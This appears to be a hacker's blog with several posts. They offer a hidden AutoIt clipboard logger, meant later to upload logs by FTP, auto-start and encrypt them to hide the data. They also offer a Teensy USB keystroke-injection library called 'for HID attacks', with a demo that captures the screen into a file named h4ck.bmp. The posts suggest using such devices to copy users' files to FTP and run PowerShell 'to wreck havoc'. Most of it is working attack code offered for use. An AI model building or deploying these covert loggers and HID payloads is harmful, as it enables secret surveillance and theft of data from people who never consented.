Autoit: Clipboard Logger

This code will create an Executable approximately 300KB that will run on your computer logging clip board data to a text file in  %USERPROFILE%\ClipLog.log
  1. Download Autoit from http://www.autoitscript.com/site/
  2. Open SciTE
  3. Copy the code from below and paste it in SciTE
  4. Save the file and hit F5 to test the script
  5. Browse to %USERPROFILE%
  6. Open ClipLog.log to view logged clip board text.
  7. If it's all good then Ctrl + Break to stop the script
  8. Then Ctrl + F7 to compile the program into a .EXE
Stuff for version 2.0
  • Copy Log to ftp
  • Auto start program on power on.
  • encrypt the data in the log to hide the information.
; Clippy.au3
; n3onli8, 22, 12, 2011
; Version 1.0



#NoTrayIcon
#include <File.au3>
#include <Clipboard.au3>


While 1
$Clippy = _ClipBoard_GetData()
if $Clippy <> "0" Then
if $Clippy <> $txtClipboard Then
_FileWriteLog(@UserProfileDir & "\ClipLog.log",$Clippy)
EndIf
EndIf
$txtClipboard=$Clippy
Sleep(100)
WEnd
Exit

Enjoy, Comment below.

<< iPrank >> Teensy ++

Enjoy Demo of n3onli8.h: http://pastebin.com/7dhjJdfN

#include <n3onli8.h>

void AltF(){
   Keyboard.set_modifier(MODIFIERKEY_ALT);
   Keyboard.send_now();
   Keyboard.set_key1(KEY_F);
   Keyboard.send_now();
   delay(200);
   Keyboard.set_modifier(0);
   Keyboard.set_key1(0);
   Keyboard.send_now();
   delay(200);
}

void setup(){
  Serial.begin(9600);
  delay(2500);
  Minimize();
  delay(200);
  PrintScreen();
  delay(200);
  Menu();
  delay(500);
  Keyboard.print("V");
  delay(200);
  Keyboard.print("D");
  delay(200);
  StartRUN();
  delay(500);
  Keyboard.print("mspaint.exe");
  delay(200);
  Enter();
  delay(350);
  Paste();
  delay(200);
  Save();
  delay(200);
  Keyboard.print("%USERPROFILE%\\h4ck.bmp");
  delay(200);
  Enter();
  delay(500);
  AltF();
  delay(100);
  Keyboard.print("K");
  delay(100);
  Keyboard.print("F");
  delay(100);
  AltF4();
  delay(200);
  Minimize(); //Restoring Windows GUI+D
}

void loop(){
}

n3onli8.h Advanced PHUKD Library Complete

Finally Completed building the n3onli8.h teensy library for HID attacks. I wanna call this version 0.1 since I have big plans for this library. Hope you guys Enjoy:

/*********************n3onli8.h**************************/

#ifndef N3ONLI8_H_INCLUDED
#define N3ONLI8_H_INCLUDED

#include "WProgram.h"

void CtrlAltDel();
void StartRUN();
void Enter();
void PrintScreen();
void Minimize();
void Menu();
void AltF4();
void Paste();
void Save();

#endif
/*******************************************************/
//http://pastebin.com/haVm6smL

/************************n3onli8.cpp**********************/

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_DELETE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1500);
}

void StartRUN()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_R);
    Keyboard.send_now();
    delay(1500);
 
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();  
    Keyboard.set_key1(KEY_BACKSPACE);
    Keyboard.send_now();
    delay(100);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
}

void Enter()
{
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void PrintScreen()
{
Keyboard.set_key1(KEY_PRINTSCREEN);
Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void Minimize()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_D);
    Keyboard.send_now();
    delay(300);

Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Menu()
{
  Mouse.set_buttons(0, 0, 1);
  Mouse.set_buttons(0, 0, 0);
}

void AltF4()
{
    Keyboard.set_modifier(MODIFIERKEY_ALT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_F4);
    Keyboard.send_now();
    delay(200);

Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Paste(){
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_V);
Keyboard.send_now();
delay(200);
Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Save(){
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_S);
Keyboard.send_now();
delay(200);
Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}
/**********************************************************/
//http://pastebin.com/YKPc6pgK

Save the 2 files in a folder called n3onli8.h and copy the folder in your Arduino\Libraries folder.
Remember >> Great Power Great responsibilities...
Cheers !!!

Other people that deserve my gratitude for HID hacking...

I have been researching online for other people who have been working along the lines of using a teensy or a similar HID device as a penetration testing tool. Check out these fellows:
  • Adrian Crenshaw at irongeek.com, has done some amazing work on the teensy platform. Had I been at Defcon 18, I would have known that he started this project back in 2010. Check out this page for information on his research and the Programmable HID USB Keystroke Dongle (PHUKD) Library.
  • Darren Kitchen from Hak5.org has been working on a project he likes to call the USB Rubber Ducky. Check out their forum to find out more.

Creating the attack Library... "n3onli8.h"

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
Keyboard.send_now();
Keyboard.set_key1(KEY_DELETE);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
}

void StartRUN()
{
Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.send_now();
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
delay(1500);

Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_key1(KEY_BACKSPACE);
Keyboard.send_now();
delay(100);

Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(100);
}

void Enter()
{
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}

/*
Check out @pastebin n3onli8.cpp http://pastebin.com/Q5bkU1t8
n3onli8.h http://pastebin.com/trrtYdec
save the .h and .cpp file in a folder called n3onli8 in arduino-0022\arduino-0022\libraries\
please note the numbers may vary with your version of Arduino SDK

Send me your ideas on library functions.
*/

Teensy Hacker ++

Earlier this year at Defcon I got introduced to the world of exploiting (HID) human interface devices. At first I was wowed by the simplicity of the attack. I could not wait to get my hands on my first Teensy from www.pjrc.com.
Initial issues with the board:
  1. Comes with Mini - USB connector. (Creates suspicion, USB drive looks like a tool)
  2. Not enough on board memory to carry payload.
  3. On first run depending on the system its being plugged into there could be a fair bit of delay for the drivers to initialize which means the code may start executing before the keyboard is ready and the exploit is a FAIL!
Initial usage for Teensy:
  1. Prank tool: Mess with Desktop, random key strokes...You get the point
  2. Copy files from "Desktop" or "My Documents" to ftp
  3. Use power shell to wreck havoc!

Next Post: I will be putting up some code for the Teensy...